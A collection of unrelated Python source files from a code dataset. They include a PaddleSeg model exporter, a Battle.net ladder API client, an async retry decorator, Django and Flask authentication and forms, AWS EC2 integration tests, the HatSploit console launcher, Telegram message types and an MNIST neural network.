from utils.config import cfg
from models.model_builder import build_model
from models.model_builder import ModelPhase
def parse_args():
parser = argparse.ArgumentParser(
description='PaddleSeg Inference Model Exporter')
parser.add_argument(
'--cfg',
dest='cfg_file',
help='Config file for training (and optionally testing)',
default=None,
type=str)
parser.add_argument(
'opts',
help='See utils/config.py for all options',
default=None,
nargs=argparse.REMAINDER)
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
return parser.parse_args()
def export_inference_config():
deploy_cfg = '''DEPLOY:
USE_GPU : 1
USE_PR : 0
MODEL_PATH : "%s"
MODEL_FILENAME : "%s"
PARAMS_FILENAME : "%s"
EVAL_CROP_SIZE : %s
MEAN : %s
STD : %s
IMAGE_TYPE : "%s"
NUM_CLASSES : %d
CHANNELS : %d
PRE_PROCESSOR : "SegPreProcessor"
PREDICTOR_MODE : "ANALYSIS"
BATCH_SIZE : 1
''' % (cfg.FREEZE.SAVE_DIR, cfg.FREEZE.MODEL_FILENAME,
cfg.FREEZE.PARAMS_FILENAME, cfg.EVAL_CROP_SIZE, cfg.MEAN, cfg.STD,
cfg.DATASET.IMAGE_TYPE, cfg.DATASET.NUM_CLASSES, len(cfg.STD))
if not os.path.exists(cfg.FREEZE.SAVE_DIR):
os.mkdir(cfg.FREEZE.SAVE_DIR)
yaml_path = os.path.join(cfg.FREEZE.SAVE_DIR, 'deploy.yaml')
with open(yaml_path, "w") as fp:
fp.write(deploy_cfg)
return yaml_path
def export_inference_model(args):
"""
Export PaddlePaddle inference model for prediction depolyment and serving.
"""
print("Exporting inference model...")
startup_prog = fluid.Program()
infer_prog = fluid.Program()
image, logit_out = build_model(
infer_prog, startup_prog, phase=ModelPhase.PREDICT)
# Use CPU for exporting inference model instead of GPU
place = fluid.CPUPlace()
exe = fluid.Executor(place)
exe.run(startup_prog)
infer_prog = infer_prog.clone(for_test=True)
if os.path.exists(cfg.TEST.TEST_MODEL):
print('load test model:', cfg.TEST.TEST_MODEL)
try:
fluid.load(infer_prog, os.path.join(cfg.TEST.TEST_MODEL, 'model'),
exe)
except:
fluid.io.load_params(
exe, cfg.TEST.TEST_MODEL, main_program=infer_prog)
else:
print("TEST.TEST_MODEL diretory is empty!")
exit(-1)
fluid.io.save_inference_model(
cfg.FREEZE.SAVE_DIR,
feeded_var_names=[image.name],
target_vars=[logit_out],
executor=exe,
main_program=infer_prog,
model_filename=cfg.FREEZE.MODEL_FILENAME,
params_filename=cfg.FREEZE.PARAMS_FILENAME)
print("Inference model exported!")
print("Exporting inference model config...")
deploy_cfg_path = export_inference_config()
print("Inference model saved : [%s]" % (deploy_cfg_path))
def main():
args = parse_args()
if args.cfg_file is not None:
cfg.update_from_file(args.cfg_file)
if args.opts:
cfg.update_from_list(args.opts)
cfg.check_and_infer()
print(pprint.pformat(cfg))
export_inference_model(args)
if __name__ == '__main__':
main()
| StarcoderdataPython |
101343 | import sys
input = sys.stdin.readline
sys.setrecursionlimit(10 ** 7)
s = []
for v in input().strip():
if v != 'B':
s.append(v)
else:
if s:
s.pop()
print(''.join(s))
| StarcoderdataPython |
3209515 | <gh_stars>0
# AUTOGENERATED! DO NOT EDIT! File to edit: 00_core.ipynb (unless otherwise specified).
__all__ = ['addition', 'multiply']
# Cell
from fastcore.all import *
from typing import Union
# Cell
from typing import Union
def addition(a:Union[int, float], b:Union[int, float]) -> Union[int, float]:
"""
A simple addition function. Add `a` to `b`.
"""
calc = a + b
return calc
# Cell
def multiply(a : float, b: float) -> float:
"""
fn multiplies two values `a` and `b`
"""
return a*b | StarcoderdataPython |
166885 | import requests
from exceptions import RequestError
from log import Log
from .ladder import Ladder
from .player import Player
class API:
@staticmethod
def get_current_season_id(params: dict) -> int:
r = requests.get("https://us.api.battle.net/data/sc2/season/current", params)
if r.status_code != 200:
raise RequestError(r, "{} returned error code {}, exiting...".format(r.url, r.status_code))
return r.json()["id"]
@staticmethod
def get_all_ladders(region_code: str, max_league_id: int, season_id: int, params: dict) -> """List of ladders""":
ladders = []
for league_id in range(max_league_id + 1):
try:
r = requests.get("https://{}.api.battle.net/data/sc2/league/{}/201/0/{}".format(region_code, season_id,
league_id), params)
if r.status_code != 200:
raise RequestError(r, "{} returned error code {}, skipping...".format(r.url, r.status_code))
Log.write_log_message("League {} Status: {}".format(league_id, r.status_code))
json = r.json()
for tier in json["tier"]:
division = tier["id"] + 1
min_mmr = tier["min_rating"]
max_mmr = tier["max_rating"]
for ladder in tier["division"]:
ladder_id = ladder["ladder_id"]
obj = Ladder(region_code, ladder_id, league_id, division, min_mmr, max_mmr)
ladders.append(obj)
except RequestError as e:
Log.write_log_message(e.__str__(), True)
return ladders
@staticmethod
def get_players_in_ladder(region_code: str, ladder: Ladder, params: dict) -> """List of players""":
players = []
r = requests.get("https://{}.api.battle.net/data/sc2/ladder/{}".format(region_code, ladder.id), params)
if r.status_code != 200:
raise RequestError(r, "{} returned error code {}, skipping...".format(r.url, r.status_code))
json = r.json()
for player in json["team"]:
try:
bnet = player["member"][0]["character_link"]["battle_tag"]
mmr = player["rating"]
games_played = player["member"][0]["played_race_count"][0]["count"]
race = player["member"][0]["played_race_count"][0]["race"]
found_player = False
for p_obj in players:
if p_obj.battletag == bnet:
p_obj.add_race(race, ladder.league_id, ladder.division, games_played, mmr)
found_player = True
if not found_player:
obj = Player(bnet, region_code)
# ladder.division + 1 is due to API having d1 be 0, d2 be 1, etc.
obj.add_race(race, ladder.league_id, ladder.division, games_played, mmr)
players.append(obj)
except KeyError:
continue
return players
| StarcoderdataPython |
1787511 | import asyncio
import logging
from functools import wraps
import inspect
from typing import (
Any,
Awaitable,
Callable,
NamedTuple,
Tuple,
Type,
TypeVar,
Union,
cast,
)
_T = TypeVar("_T")
_log = logging.getLogger(__name__)
async def _noop(*args, **kwargs):
pass
def retryableasyncmethod(
types: Tuple[Type[BaseException], ...],
*,
max_attempts: Union[int, str],
wait_timeout: Union[float, str],
lock: Union[asyncio.Lock, str] = None,
on_retry: Union[Callable[[BaseException], Awaitable], str] = None,
):
"""
Decorator to wrap an async method and make it retryable.
"""
def make_retryable(func: _T) -> _T:
if inspect.isasyncgenfunction(func):
raise TypeError("Async generator functions are not supported")
f: Any = cast(Any, func)
@wraps(f)
async def async_retryable_decorator(self, *args, **kwargs):
last_exc = None
retry = _noop
if isinstance(on_retry, str):
retry = getattr(self, on_retry)
elif callable(on_retry):
retry = on_retry
attempts: int
if isinstance(max_attempts, str):
attempts = getattr(self, max_attempts)
else:
attempts = max_attempts
timeout: float
if isinstance(wait_timeout, str):
timeout = getattr(self, wait_timeout)
else:
timeout = wait_timeout
retry_lock = None
if isinstance(lock, str):
retry_lock = getattr(self, lock)
elif lock is not None:
retry_lock = lock
# Use an exponential backoff, starting with 1s
# and with a maximum of whatever was configured
current_wait_timeout = min(1, timeout)
for attempt in range(1, attempts + 1):
try:
return await f(self, *args, **kwargs)
except types as exc:
_log.error("Attempt %r/%r failed", attempt, attempts, exc_info=exc)
last_exc = exc
_log.debug("Waiting %.2fs before next attempt", current_wait_timeout)
await asyncio.sleep(current_wait_timeout)
current_wait_timeout = min(current_wait_timeout * 2, timeout)
if retry_lock is not None:
if retry_lock.locked():
_log.debug("Already retrying, possibly on another method")
else:
async with retry_lock:
_log.debug("Calling retry method")
await retry(last_exc)
else:
await retry(last_exc)
if last_exc is None:
last_exc = Exception("All %r attempts failed" % attempts)
raise last_exc
return cast(_T, async_retryable_decorator)
return make_retryable
| StarcoderdataPython |
136852 | <filename>projeto-01/measure.py
from subprocess import run
from os import path, makedirs
import csv
if not path.exists("./sort"):
run(["make", "build"])
makedirs(path.join(path.curdir, "data"), exist_ok=True)
for sort_method in ("merge", "heap", "bubble"):
with open(path.join(path.curdir, "data", f"{sort_method}_sort.csv"), "w", newline="") as csv_file:
csv_writer = csv.writer(csv_file, delimiter=";")
csv_writer.writerow(["case", "method", "entries", "time(s)", "memory(kb)"])
for sort_case in ("best", "random", "worst"):
for entries in (
(1e4, 1e5, 1e6) if sort_method == "bubble" and sort_case != "best" else (1e4, 1e5, 1e6, 1e7, 1e8, 1e9)
):
run(["./memusg.py", "./sort", sort_method, sort_case, "{:.0f}".format(entries)])
| StarcoderdataPython |
3223109 | <reponame>dpouris/chore-battle<gh_stars>1-10
from rest_framework_simplejwt.authentication import JWTAuthentication
from django.conf import settings
from rest_framework.authentication import CSRFCheck
from rest_framework import exceptions
def enforce_csrf(request):
"""
Enforce CSRF validation.
"""
check = CSRFCheck()
# populates request.META['CSRF_COOKIE'], which is used in process_view()
check.process_request(request)
reason = check.process_view(request, None, (), {})
if reason:
# CSRF failed, bail with explicit error message
raise exceptions.PermissionDenied('CSRF Failed: %s' % reason)
class CustomAuthentication(JWTAuthentication):
def authenticate(self, request):
header = self.get_header(request)
if header is None:
raw_token = request.COOKIES.get(settings.SIMPLE_JWT['AUTH_COOKIE']) or None
else:
raw_token = self.get_raw_token(header)
if raw_token is None:
return None
validated_token = self.get_validated_token(raw_token)
# enforce_csrf(request)
return self.get_user(validated_token), validated_token | StarcoderdataPython |
169018 | # Copyright Amazon.com Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You may
# not use this file except in compliance with the License. A copy of the
# License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is distributed
# on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
# express or implied. See the License for the specific language governing
# permissions and limitations under the License.
"""Integration tests for the InternetGateway API.
"""
import boto3
import pytest
import time
import logging
from acktest.resources import random_suffix_name
from acktest.k8s import resource as k8s
from e2e import service_marker, CRD_GROUP, CRD_VERSION, load_ec2_resource
from e2e.replacement_values import REPLACEMENT_VALUES
RESOURCE_PLURAL = "internetgateways"
CREATE_WAIT_AFTER_SECONDS = 10
DELETE_WAIT_AFTER_SECONDS = 10
@pytest.fixture(scope="module")
def ec2_client():
return boto3.client("ec2")
def get_internet_gateway(ec2_client, ig_id: str) -> dict:
try:
resp = ec2_client.describe_internet_gateways(
Filters=[{"Name": "internet-gateway-id", "Values": [ig_id]}]
)
except Exception as e:
logging.debug(e)
return None
if len(resp["InternetGateways"]) == 0:
return None
return resp["InternetGateways"][0]
def internet_gateway_exists(ec2_client, ig_id: str) -> bool:
return get_internet_gateway(ec2_client, ig_id) is not None
@service_marker
@pytest.mark.canary
class TestInternetGateway:
def test_create_delete(self, ec2_client):
resource_name = random_suffix_name("ig-ack-test", 24)
replacements = REPLACEMENT_VALUES.copy()
replacements["INTERNET_GATEWAY_NAME"] = resource_name
# Load Internet Gateway CR
resource_data = load_ec2_resource(
"internet_gateway",
additional_replacements=replacements,
)
logging.debug(resource_data)
# Create k8s resource
ref = k8s.CustomResourceReference(
CRD_GROUP, CRD_VERSION, RESOURCE_PLURAL,
resource_name, namespace="default",
)
k8s.create_custom_resource(ref, resource_data)
cr = k8s.wait_resource_consumed_by_controller(ref)
assert cr is not None
assert k8s.get_resource_exists(ref)
resource = k8s.get_resource(ref)
resource_id = resource["status"]["internetGatewayID"]
time.sleep(CREATE_WAIT_AFTER_SECONDS)
# Check Internet Gateway exists
exists = internet_gateway_exists(ec2_client, resource_id)
assert exists
# Delete k8s resource
_, deleted = k8s.delete_custom_resource(ref, 2, 5)
assert deleted is True
time.sleep(DELETE_WAIT_AFTER_SECONDS)
# Check Internet Gateway doesn't exist
exists = internet_gateway_exists(ec2_client, resource_id)
assert not exists | StarcoderdataPython |
1720983 | <filename>Controllers/Utilities.py
from flask import jsonify
from flask_restful import Resource
# Authentication #
from Other.Authentication import require_auth
from Other.SharedResources import g_user
class ValidateIP(Resource):
def get(self):
return jsonify({"answer":"True"})
class ValidateLogin(Resource):
method_decorators = [require_auth]
def get(self):
return jsonify({"answer":"True",
"phoneNumber":g_user.userObj["PHONENUMBER"]}) | StarcoderdataPython |
3229023 | <filename>users/management/commands/dispensary_import.py<gh_stars>1-10
import datetime
from django.core.management.base import BaseCommand
from openpyxl import load_workbook
import clients.models as clients
class Command(BaseCommand):
def add_arguments(self, parser):
"""
:param path - файл с картами пациентов + диагноз Д-учета
"""
parser.add_argument('path', type=str)
def handle(self, *args, **kwargs):
fp = kwargs["path"]
self.stdout.write("Path: " + fp)
wb = load_workbook(filename=fp)
ws = wb[wb.sheetnames[0]]
starts = False
for row in ws.rows:
cells = [str(x.value) for x in row]
if not starts:
if "карта" in cells and "диагноз" in cells and "дата1" in cells:
starts = True
num_card = cells.index("карта")
diag = cells.index("диагноз")
date_start = cells.index("дата1")
else:
if clients.Card.objects.filter(number_poliklinika=cells[num_card]).exists():
card = clients.Card.objects.filter(number_poliklinika=cells[num_card]).first()
day_start = datetime.datetime.strptime(cells[date_start], "%Y-%m-%d %H:%M:%S").date()
clients.DispensaryReg.objects.update_or_create(card=card, diagnos=cells[diag], defaults={'date_start': day_start})
print('добавлен/обновлен Д-учет: \n') # noqa: T001
print(card, 'Диагноз:дата постановки: ', cells[diag], day_start) # noqa: T001
| StarcoderdataPython |
1676743 | <reponame>adolabsnet/HatSploit
#!/usr/bin/env python3
#
# MIT License
#
# Copyright (c) 2020-2021 EntySec
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
import os
import readline
from core.base.io import io
from core.util.tip import tip
from core.base.jobs import jobs
from core.base.execute import execute
from core.base.loader import loader
from core.base.config import config
from core.cli.badges import badges
from core.util.banner import banner
from core.cli.colors import colors
from core.base.storage import local_storage
from core.modules.modules import modules
from core.base.exceptions import exceptions
class console:
def __init__(self):
self.io = io()
self.tip = tip()
self.jobs = jobs()
self.execute = execute()
self.loader = loader()
self.config = config()
self.badges = badges()
self.banner = banner()
self.colors = colors()
self.local_storage = local_storage()
self.modules = modules()
self.exceptions = exceptions()
self.history = self.config.path_config['base_paths']['history_path']
def check_root(self):
if os.getuid() == 0:
return True
self.badges.output_error("Operation not permitted!")
return False
def check_install(self):
if os.path.exists(self.config.path_config['base_paths']['root_path']):
return True
self.badges.output_error("HatSploit is not installed!")
self.badges.output_information("Consider running ./install.sh")
return False
def start_hsf(self):
try:
self.loader.load_all()
except Exception:
sys.exit(1)
def launch_menu(self):
while True:
try:
if not self.modules.check_current_module():
prompt = '(hsf)> '
else:
module = self.modules.get_current_module_name()
name = self.modules.get_current_module_object().details['Name']
prompt = '(hsf: ' + self.modules.get_category(module) + ': ' + self.colors.RED + name + self.colors.END + ')> '
commands, arguments = self.io.input(prompt)
self.jobs.stop_dead()
self.execute.execute_command(commands, arguments)
if self.local_storage.get("history"):
readline.write_history_file(self.history)
except (KeyboardInterrupt, EOFError, self.exceptions.GlobalException):
pass
except Exception as e:
self.badges.output_error("An error occurred: " + str(e) + "!")
def enable_history_file(self):
if not os.path.exists(self.history):
open(self.history, 'w').close()
readline.read_history_file(self.history)
def launch_shell(self):
using_history = self.local_storage.get("history")
if using_history:
self.enable_history_file()
readline.parse_and_bind("tab: complete")
version = self.config.core_config['details']['version']
codename = self.config.core_config['details']['codename']
if self.config.core_config['console']['clear']:
self.badges.output_empty(self.colors.CLEAR, end='')
if self.config.core_config['console']['banner']:
self.banner.print_random_banner()
if self.config.core_config['console']['header']:
plugins = self.local_storage.get("plugins")
modules = self.local_storage.get("modules")
plugins_total = 0
modules_total = 0
if plugins:
for database in plugins.keys():
plugins_total += len(plugins[database])
if modules:
for database in modules.keys():
for module_category in modules[database].keys():
for module_platform in modules[database][module_category].keys():
modules_total += len(modules[database][module_category][module_platform])
header = ""
header += f"{self.colors.END}\n"
if codename and not codename.isspace():
header += f" --=( {self.colors.YELLOW}HatSploit Framework {codename} {version}{self.colors.END}\n"
else:
header += f" --=( {self.colors.YELLOW}HatSploit Framework {version}{self.colors.END}\n"
header += f"--==--=( Developed by EntySec ({self.colors.LINE}https://entysec.netlify.app/{self.colors.END})\n"
header += f" --=( {modules_total} modules loaded | {plugins_total} plugins available\n"
header += f"{self.colors.END}"
self.badges.output_empty(header)
if self.config.core_config['console']['tip']:
self.tip.print_random_tip()
self.badges.output_empty("")
def shell(self):
self.start_hsf()
self.launch_shell()
self.launch_menu()
| StarcoderdataPython |
1699562 | from typing import List, Optional
from pydantic import Field, BaseModel
from tottle.types.objects.alert import ProximityAlertTriggered
from tottle.types.objects.animation import Animation
from tottle.types.objects.audio import Audio
from tottle.types.objects.chat import Chat
from tottle.types.objects.contact import Contact
from tottle.types.objects.dice import Dice
from tottle.types.objects.entity import Entity
from tottle.types.objects.game import Game
from tottle.types.objects.invoice import Invoice
from tottle.types.objects.keyboard import InlineKeyboardMarkup
from tottle.types.objects.location import Location
from tottle.types.objects.passport import PassportData
from tottle.types.objects.payment import SuccessfulPayment
from tottle.types.objects.photo import PhotoSize
from tottle.types.objects.poll import Poll
from tottle.types.objects.sticker import Sticker
from tottle.types.objects.user import User
from tottle.types.objects.venue import Venue
from tottle.types.objects.video import Video, VideoNote
class Message(BaseModel):
chat: Optional["Chat"] = None
date: Optional[int] = None
message_id: Optional[int] = None
from_user: Optional["User"] = Field(alias="from")
forward_from: Optional["User"] = None
forward_from_chat: Optional["Chat"] = None
forward_from_message_id: Optional[int] = None
forward_signature: Optional[str] = None
forward_sender_name: Optional[str] = None
forward_date: Optional[int] = None
reply_to_message: Optional["Message"] = None
via_bot: Optional["User"] = None
edit_date: Optional[int] = None
media_group_id: Optional[str] = None
author_signature: Optional[str] = None
text: Optional[str] = None
entities: Optional[List["Entity"]] = None
animation: Optional["Animation"] = None
audio: Optional["Audio"] = None
photo: Optional[List["PhotoSize"]] = None
sticker: Optional["Sticker"] = None
video: Optional["Video"] = None
video_note: Optional["VideoNote"] = None
caption: Optional[str] = None
caption_entities: Optional[List["Entity"]] = None
contact: Optional["Contact"] = None
dice: Optional["Dice"] = None
game: Optional["Game"] = None
poll: Optional["Poll"] = None
venue: Optional["Venue"] = None
location: Optional["Location"] = None
new_chat_members: Optional[List["User"]] = None
new_chat_title: Optional[str] = None
new_chat_photo: Optional[List["PhotoSize"]] = None
delete_chat_photo: Optional[bool] = None
group_chat_created: Optional[bool] = None
supergroup_chat_created: Optional[bool] = None
channel_chat_created: Optional[bool] = None
migrate_to_chat_id: Optional[int] = None
migrate_from_chat_id: Optional[int] = None
pinned_message: Optional["Message"] = None
invoice: Optional["Invoice"] = None
successful_payment: Optional["SuccessfulPayment"] = None
connected_website: Optional[str] = None
passport_data: Optional["PassportData"] = None
proximity_alert_triggered: Optional["ProximityAlertTriggered"] = None
reply_markup: Optional["InlineKeyboardMarkup"] = None
Message.update_forward_refs()
| StarcoderdataPython |
3201699 | <reponame>Hickey3197/educoder<filename>Handwritten_digit_recognition/Handwritten.py
import numpy
import scipy.special
import matplotlib.pyplot
import imageio
import glob
# 神经网络类定义
class neuralNetwork:
# 初始化神经网络
def __init__(self, inputnodes, hiddennodes, outputnodes, learningrate):
# 设置每个输入、隐藏、输出层的节点数
self.inodes = inputnodes
self.hnodes = hiddennodes
self.onodes = outputnodes
# 链接权值矩阵,wih and who
# 数组中的权重是w_i_j,其中链路是从节点i到下一层的节点j
# w11 w21
# w12 w22 etc
self.wih = numpy.random.normal(0.0, pow(self.inodes, -0.5), (self.hnodes, self.inodes))
self.who = numpy.random.normal(0.0, pow(self.hnodes, -0.5), (self.onodes, self.hnodes))
# 学习速率
self.lr = learningrate
# 激活函数是s型函数
self.activation_function = lambda x: scipy.special.expit(x)
pass
# 训练神经网络
def train(self, inputs_list, targets_list):
# 将输入列表转换为二维数组
inputs = numpy.array(inputs_list, ndmin=2).T
targets = numpy.array(targets_list, ndmin=2).T
# 计算信号到隐藏层
hidden_inputs = numpy.dot(self.wih, inputs)
# 计算从隐含层出现的信号
hidden_outputs = self.activation_function(hidden_inputs)
# 计算信号到最终的输出层
final_inputs = numpy.dot(self.who, hidden_outputs)
# 计算从最终输出层出现的信号
final_outputs = self.activation_function(final_inputs)
# 输出层误差为(目标值-实际值)
output_errors = targets - final_outputs
# 隐藏层错误是output_errors,按权重分割,在隐藏节点处重新组合
hidden_errors = numpy.dot(self.who.T, output_errors)
# 更新隐藏层和输出层之间的链接的权重
self.who += self.lr * numpy.dot((output_errors * final_outputs * (1.0 - final_outputs)),
numpy.transpose(hidden_outputs))
# 更新输入层和隐藏层之间的链接的权值
self.wih += self.lr * numpy.dot((hidden_errors * hidden_outputs * (1.0 - hidden_outputs)),
numpy.transpose(inputs))
pass
# 查询神经网络
def query(self, inputs_list):
# 将输入列表转换为二维数组
inputs = numpy.array(inputs_list, ndmin=2).T
# 计算信号到隐藏层
hidden_inputs = numpy.dot(self.wih, inputs)
# 计算从隐含层出现的信号
hidden_outputs = self.activation_function(hidden_inputs)
# 计算信号到最终的输出层
final_inputs = numpy.dot(self.who, hidden_outputs)
# 计算从最终输出层出现的信号
final_outputs = self.activation_function(final_inputs)
return final_outputs
# 输入、隐藏和输出节点的数量
input_nodes = 784
hidden_nodes = 200
output_nodes = 10
# 学习速率
learning_rate = 0.1
# 创建神经网络实例
n = neuralNetwork(input_nodes,hidden_nodes,output_nodes, learning_rate)
# 将mnist训练数据CSV文件加载到列表中
training_data_file = open("MNIST_data/mnist_train.csv", 'r')
training_data_list = training_data_file.readlines()
training_data_file.close()
# 训练神经网络
# epochs是训练数据集用于训练的次数
epochs = 10
for e in range(epochs):
# 检查训练数据集中的所有记录
for record in training_data_list:
# 用逗号分隔记录
all_values = record.split(',')
# 规模和转移输入
inputs = (numpy.asfarray(all_values[1:]) / 255.0 * 0.99) + 0.01
# 创建目标输出值(都是0.01,除了所需的标签为0.99)
targets = numpy.zeros(output_nodes) + 0.01
# all_values[0]是该记录的目标标签
targets[int(all_values[0])] = 0.99
n.train(inputs, targets)
pass
pass
# 测试神经网络
# 将mnist测试数据csv文件加载到列表中
test_data_file = open("MNIST_data/mnist_test.csv", 'r')
test_data_list = test_data_file.readlines()
test_data_file.close()
# 记录神经网络执行情况,最初为空
scorecard = []
# 遍历测试数据集中的所有记录
for record in test_data_list:
all_values = record.split(',')
# 正确答案为第一个值
correct_label = int(all_values[0])
# 规模和转移输入
inputs = (numpy.asfarray(all_values[1:]) / 255.0 * 0.99) + 0.01
# 查询神经网络
outputs = n.query(inputs)
# 最大值的索引对应于标签
label = numpy.argmax(outputs)
# print("Answer label is:",correct_label," ; ",label," is network's answer")
# 判断结果正不正确
if (label == correct_label):
# 神经网络的测试结果与正确结果匹配,如果正确scorecard加1
scorecard.append(1)
else:
scorecard.append(0)
pass
# 计算准确率
scorecard_array = numpy.asarray(scorecard)
print("准确率为:", scorecard_array.sum() / scorecard_array.size)
# 用自己写的的图像测试数据集
our_own_dataset = []
# 加载png图像数据作为测试数据集
for image_file_name in glob.glob('Number4.png'):
# 使用文件名设置正确的标签
label = int(image_file_name[-5:-4])
# 将png文件图像转为数组
print("加载文件:", image_file_name)
img_array = imageio.imread(image_file_name, as_gray=True)
# 每张图片都由一个28 ×28 的矩阵表示,每张图片都由一个784 维的向量表示(28*28=784)
# 将数组的值减去了255.0。常规而言,0指的是黑色,255指的是白色,但是,MNIST数据集使用相反的方式表示,因此将值逆转过来以匹配MNIST数据
# 从28x28重塑到包含784个值的列表,反转值
img_data = 255.0 - img_array.reshape(784)
# 然后将数据缩放到范围从0.01到1.0
img_data = (img_data / 255.0 * 0.99) + 0.01
print(numpy.min(img_data))
print(numpy.max(img_data))
# 附加标签和图像数据来测试数据集
record = numpy.append(label, img_data)
our_own_dataset.append(record)
pass
# 用我们自己的图像来测试神经网络
# 记录测试
item = 0
# plot image
matplotlib.pyplot.imshow(our_own_dataset[item][1:].reshape(28,28), cmap='Greys', interpolation='None')
# 正确答案为第一个值
correct_label = our_own_dataset[item][0]
# 数据是剩余值
inputs = our_own_dataset[item][1:]
# 查询神经网络
outputs = n.query(inputs)
print (outputs)
# 最大值的索引对应于标签
label = numpy.argmax(outputs)
print("神经网络测试结果:", label)
# 判断结果正不正确
if (label == correct_label):
print ("match!")
else:
print ("no match!")
pass
| StarcoderdataPython |
58896 | <filename>SNIC/data.py
import pandas as pd
import matplotlib.pyplot as plt
df = pd.read_csv("snic-provincias.csv")
print(df.head())
print(df.columns)
print(df.anio.describe())
plt.plot(df.anio, df.cantidad_hechos)
plt.show() | StarcoderdataPython |
1693869 | <reponame>HarshShah03325/Emotion_Recognition
import model
import json
from util import VolumeDataGenerator
def train_model(steps_per_epoch, n_epochs, validation_steps):
'''
trains a 3D Unet for give parameters:
steps_per_epoch
n_epochs
validation_steps
The function uses train generator and valid generator for model.fit_generator() method.
'''
base_dir = 'BraTS-Data/processed/'
with open("config.json") as json_file:
config = json.load(json_file)
# Get generators for training and validation sets
train_generator = VolumeDataGenerator(config["train"], base_dir + "train/", batch_size=3, dim=(160, 160, 16), verbose=1)
valid_generator = VolumeDataGenerator(config["valid"], base_dir + "valid/", batch_size=3, dim=(160, 160, 16), verbose=1)
trained_model = model.Unet()
trained_model.fit_generator(generator=train_generator,
steps_per_epoch=steps_per_epoch,
epochs=n_epochs,
use_multiprocessing=False,
validation_data=valid_generator,
validation_steps=validation_steps)
return trained_model
def save_model(steps_per_epoch=2, n_epochs=1, validation_steps=2):
'''
Save weights of a model trained for given parameters:
steps_per_epoch
n_epochs
validation_steps
'''
model = train_model(steps_per_epoch, n_epochs,validation_steps)
model.save_weights('pretrained_model.hdf5')
save_model() | StarcoderdataPython |
1754860 | <gh_stars>0
# coding: utf-8
"""dynamic_raw_id filters."""
from django import forms
from django.contrib import admin
from dynamic_raw_id.widgets import DynamicRawIDWidget
class DynamicRawIDFilterForm(forms.Form):
"""Form for dynamic_raw_id filter."""
def __init__(self, rel, admin_site, field_name, **kwargs):
"""Construct field for given field rel."""
super(DynamicRawIDFilterForm, self).__init__(**kwargs)
self.fields["%s" % field_name] = forms.IntegerField(
label="",
widget=DynamicRawIDWidget(rel=rel, admin_site=admin_site),
required=False,
)
class DynamicRawIDFilter(admin.filters.FieldListFilter):
"""Filter list queryset by primary key of related object."""
template = "dynamic_raw_id/admin/filters/dynamic_raw_id_filter.html"
def __init__(self, field, request, params, model, model_admin, field_path):
"""Use GET param for lookup and form initialization."""
self.lookup_kwarg = "%s" % field_path
super(DynamicRawIDFilter, self).__init__(
field, request, params, model, model_admin, field_path
)
rel = field.remote_field
self.form = self.get_form(request, rel, model_admin.admin_site)
def choices(self, cl):
"""Filter choices are not available."""
return []
def expected_parameters(self):
"""Return GET params for this filter."""
return [self.lookup_kwarg]
def get_form(self, request, rel, admin_site):
"""Return filter form."""
return DynamicRawIDFilterForm(
admin_site=admin_site,
rel=rel,
field_name=self.field_path,
data=self.used_parameters,
)
def queryset(self, request, queryset):
"""Filter queryset using params from the form."""
if self.form.is_valid():
# get no null params
filter_params = dict(
filter(lambda x: bool(x[1]), self.form.cleaned_data.items())
)
return queryset.filter(**filter_params)
return queryset
| StarcoderdataPython |
1750074 | <filename>events/forms.py
from django.utils.safestring import mark_safe
from django import forms
from django.forms.widgets import TextInput, Media
from django.core.validators import validate_email
from django.utils.translation import ugettext_lazy as _
from django.utils import timezone
from django.contrib.auth.models import User
from .models.locale import Country, SPR, City
from .models.profiles import Team, UserProfile, Sponsor
from .models.events import (
Event,
EventComment,
CommonEvent,
EventSeries,
Place,
EventPhoto,
)
from .models.speakers import (
Speaker,
Talk,
Presentation,
SpeakerRequest,
)
import recurrence
import pytz
from datetime import time
from time import strptime, strftime
class Lookup(TextInput):
input_type = 'text'
template_name = 'forms/widgets/lookup.html'
add_id_index = False
checked_attribute = {'selected': True}
option_inherits_attrs = False
def __init__(self, source, key="id", label='__str__', attrs=None):
super().__init__(attrs)
self.source = source
self.key = key
self.label = label
def get_context(self, name, value, attrs):
context = super().get_context(name, value, attrs)
return context
def format_value(self, value):
if value is not None:
lookup_query = {self.key: value}
lookup_object = self.source.objects.get(**lookup_query)
lookup_field = getattr(lookup_object, self.label)
if callable(lookup_field):
lookup_value = lookup_field()
else:
lookup_value = lookup_field
return mark_safe('<option value="%s">%s</option>' % (value, lookup_value))
else:
return mark_safe('<option value="">--------</option>')
class DateWidget(forms.DateInput):
"""A more-friendly date widget with a p% if widget.value != None %} value="{{ widget.value|stringformat:'s' }}"{% endif %op-up calendar.
"""
template_name = 'forms/widgets/date.html'
def __init__(self, attrs=None):
self.date_class = 'datepicker'
if not attrs:
attrs = {}
if 'date_class' in attrs:
self.date_class = attrs.pop('date_class')
if 'class' not in attrs:
attrs['class'] = 'date'
super(DateWidget, self).__init__(attrs=attrs)
class TimeWidget(forms.MultiWidget):
"""A more-friendly time widget.
"""
def __init__(self, attrs=None):
self.time_class = 'timepicker'
if not attrs:
attrs = {}
if 'time_class' in attrs:
self.time_class = attrs.pop('time_class')
if 'class' not in attrs:
attrs['class'] = 'time'
widgets = (
forms.Select(attrs=attrs, choices=[(i + 1, "%02d" % (i + 1)) for i in range(0, 12)]),
